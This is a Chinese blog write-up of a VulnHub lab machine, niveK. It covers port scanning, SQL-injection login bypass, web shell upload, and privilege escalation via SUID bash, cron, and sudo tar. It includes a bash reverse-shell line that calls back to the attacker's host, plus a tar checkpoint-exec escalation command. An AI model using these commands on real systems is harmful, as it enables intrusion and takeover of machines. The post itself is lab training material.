Vulnhub_Nivek

最新推荐文章于 2024-01-30 15:07:51 发布
最新推荐文章于 2024-01-30 15:07:51 发布
阅读量608 收藏
点赞数
文章标签: shell centos linux docker 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/119988551
版权


主机信息

kali:192.168.3.28
nivek:192.168.3.31

信息收集

通过nmap探测目标主机发现开放了21、22、7080三个端口

nmap -T4 -A -v -p- 192.168.3.31


访问7080端口是一个后台登录界面

尝试使用万能密码进行登录

'OR 1=1 # 
'OR 1=1 --


由于前端对input输入框做了类型限制,所以删除用户名input的type即可进行正常输入

成功进入后台

通过查看后台首页原密码,发现一个被注释的设置页面,访问后可以对该网站做一些配置

GETSHELL

选择木马进上传

查看上传后的文件路径

访问上传的木马后反弹回一个shell

将检测脚本下载到目标主机

执行检测脚本并将结果输出到1.txt,但是tmp目录下无法查看

然后查看nivek的家目录找到一个flag

提权

查找具有suid权限的程序,发现eren具有bash的suid权限

执行/usr/bin/bash -p后具有了

进入eren的家目录后发现一个备份脚本

查看定时任务发现每5分钟会进行一次自动备份

然后将bash反弹shell的命令追加到备份脚本中

echo "bash -i >& /dev/tcp/192.168.3.30/1234 0>&1" >> backup.sh


大约5分钟左后会返回一个eren权限的shell

执行官sudo -l发现tar命令可以进行提取

执行提取命令进行提权

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh


进入root目录查看flag

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
B2B市场采购指南.pdf
01-02
Mosconi和Nivek Sankaran共同撰写的报告,出自《麦肯锡高层管理论丛》2001年2期。这篇报告主要探讨了企业对企业(B2B)电子市集的价值及其可持续性。报告指出,B2B电子市集的成功并不单纯依赖于价格竞争,而是应该...
nivek靶场-vulnhub
lionwerson的博客
11-22 2842
https://download.vulnhub.com/hms/niveK.ovahttp://niveK靶场1.下载靶场,打开virtual box导入靶场,网络改为桥接模式,打开虚拟机。 2.nmap先来扫描一下端口: nmap 192.168.0.17 -p- 扫描出7080为web端口,浏览器打开发现登录页面: 抓包一下,看到登录页面有sql注入漏洞: 既然存在sql注入,那么就试了一下万能登录,登录成功,进入了后台: 进入后台寻找注入和上传点,另外扫描器找...
vlunhub系列之narak
hanjinming110的博客
08-05 254
vlunhub系列之narak
Vulnhub靶机:niveK
最新发布
qq_48904485的博客
01-30 1105
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:niveK(10.0.2.41)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hms/niveK.ova。
靶场实战(12):OSCP备考之VulnHub SEPPUKU
OneMoreThink
01-09 1094
打靶思路资产发现主机发现服务发现(端口、服务、组件、版本)漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)7080端口/HTTPS服务组件漏洞URL漏洞(目录、文件)7601端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提...
Windows 查看端口占用并关闭
qq_35989920的博客
04-15 3800
在启动服务的时候,可能会遇到端口被占用的情况。这时就要知道哪个服务占用了这个端口,并将其关闭。然后再启动服务就不会存在端口占用了。
linux 端口占用查看
yu1xue1fei的博客
01-17 194
1.lsof -i:7080 查看时7080端口情况 如果有信息输出表示有应用在占用 2.使用netstat -tunlp | grep 7080 有信息表示有应用再使用 3. lsof 输出的结果 PID 是进程号 5137/java 表示:7080 这个端口 被java程序在使用 进程号是5137 ...
SpringCloud Alibaba【Nacos集群搭建(Windows+Linux)&Ribbon负载均衡】
Vinjcent
05-23 2931
目录SpringCloud Alibaba1. Alibaba微服务组件Nacos注册中心(Eureka服务注册于发现)1.1 什么是Nacos1.2 服务与注册中心1.3 使用nacos服务与注册,通过应用名访问1.4 有关 Nacos Discovery Starter 配置的更多信息2. Nacos集群部署(eureka1、eureka2,eureka3)2.1 在Linux虚拟机中配置Nacos2.2 Nacos自带的微服务负载均衡器Ribbon2.2.1 Ribbon负载均衡策略2.2.2 修改默
VulnHub日记(六):HMS
Dawn_Xi的博客
08-17 587
靶机介绍 虚拟机链接:https://www.vulnhub.com/entry/hms-1,728/ 参考博客: 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.115 查看ip和开启端口 fping -aqg 192.168.56.0/24 nmap -A -v -Pn -p- 192.168.56.115 ftp可以匿名登录,7080端口开放http,有登陆页面,在忘记密码页面,得到了提示,认为有可以sql注入的可能 于是返...
渗透测试实战Vulnhub-Lampiao
weixin_44558065的博客
06-22 1665
目录 一、设计概述 1.1、渗透测试的意义 1.2、渗透测试的目的 二、需求分析 2.1、用户需求分析 2.2、渗透测试 三、方案规划与实施 3.1、信息收集 3.1.1 Nmap扫描 3.1.2 wpscan扫描 3.1.4 webdirscan目录扫描 3.2 漏洞分析 3.2.1 漏洞名称 3.2.2 漏洞概述 3.2.3 漏洞点 3.2.4 漏洞触发流程 3.2.5 漏洞利用 3.2.6 修复意见 3.3 web渗透 一、设计概述 1.1、渗透测试的意义 信息安全等级保护的要求 2015年12月2
nivek(tar提权)
m0_66299232的博客
11-09 813
3.用-p提权上来发现euid变为了eren用户,那就可以进入用户目录,有一个backup.sh文件eren用户权限是可读可写可执行。7.在本地开启监听,尝试上传我们的php-reverse-shell.php(github里有),发现上传路径。2.寻找有suid执行权限的文件,发现有一个/bin/bash。4.把反弹shell的命令写入.sh文件中,等待反弹。1.用gobuster探测目录,没探测出来。5.成功登录进去,寻找可利用信息,和上传点。6.成功进入root,轻松拿下!点俩次放包,页面就进去了。
Apache Log4j2远程代码执行漏洞(CVE-2021-44228)复现
qq_40640917的博客
01-10 2524
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
NiveK 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
01-16 364
NiveK靶场渗透记录~
应用安全 - 端口漏洞整理
weixin_30549175的博客
06-18 2896
21 FTP弱密码22 SSH弱密码23 telnet弱密码25 邮件伪造,vrfy/expn查询邮件用户信息,可使用smtp-user-enum工具来自动跑53 DNS溢出、远程代码执行、允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控69 尝试下载目标及其的各类重要配置文件80 IIS6 RCE80-89 应用服务器端口 110 POP3 可尝试爆破,嗅探111 NFS ...
HMS1靶机wp
m0_52496313的博客
09-02 319
HMS1靶机wp
harbor 多端口_harbor修改默认的80端口
weixin_39637363的博客
12-21 877
之前做私库的时候会在harbor中直接加入https证书,但是会占用80和443,如果再添加其它的虚拟主机比较麻烦,这里直接改为其它端口。再通过物理机上的nginx去反向代理harbor(https)。harbor修改步骤:1、配置文件[root@node1 harbor]# vim harbor.cfgui_url_protocol = http 这里只用http,不像之前改为https2、服务...
linux常见报错种类
zuo84526076的博客
02-12 2645
说起来日常的故障,其实,首先应该相到的就是:“备份”。毕竟再怎么牢固的系统或硬件都会有故障的时候,所以,备份放第一位。 作为linux运维,多多少少会碰见这样那样的问题或故障,从中总结经验,查找问题,汇总并分析故障的原因,这是一个Linux运维工程师良好的习惯。每一次技术的突破,都经历着苦闷,伴随着快乐,可我们还是执着的继续努力,从中也积累了更多的经验,这就是实践给予我们的丰厚回报。 常见问题解决集锦 1.shell脚本不执行 问题: 某天研发某同事找我说帮他看看他写的shell脚本,死活不执行,报错。我看
nginx 已有80端口服务如何在开启一个非80端口的静态资源指向
Flyer的后花园
10-14 5066
 要求是这样的 当前以及有一个80端口 http服务的的动态server A  然后A服务也有也有静态资源的指向  如果这个时候在这这个nginx做一个新的非80服务的纯静态资源包的指向  如何做?   1 首先给出一个 例子 针对的不是上面描述的需求 就是已经有一个非80端口的静态资源指向 ,再给出另外一个别的非80端口的静态资源的指向     server { listen 7...
Linux运维排查常见故障
qq_40907977的博客
03-09 3316
1.shell脚本不执行 **问题:**某天研发某同事找我说帮他看看他写的shell脚本,死活不执行,报错。我看了下,脚本很简单,也没有常规性的错误,报“:badinterpreter:Nosuchfileordirectory”错。 看这错,我就问他是不是在windows下编写的脚本,然后在上传到linux服务器的……果然。 原因: 在DOS/windows里,文本文件的换行符为rn,而在nix系统里则为n,所以DOS/Windows里编辑过的文本文件到了nix里,每一行都多了个^M。 解决: 1)重新
几个高危端口
热门推荐
12-26 2万+
注意到检测系统显示的高危漏洞分别是22,135,139,445,3389端口。今天就分别了解下这些端口一般情况下是干什么用的。2222端口一般用于ftp的数据传输。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值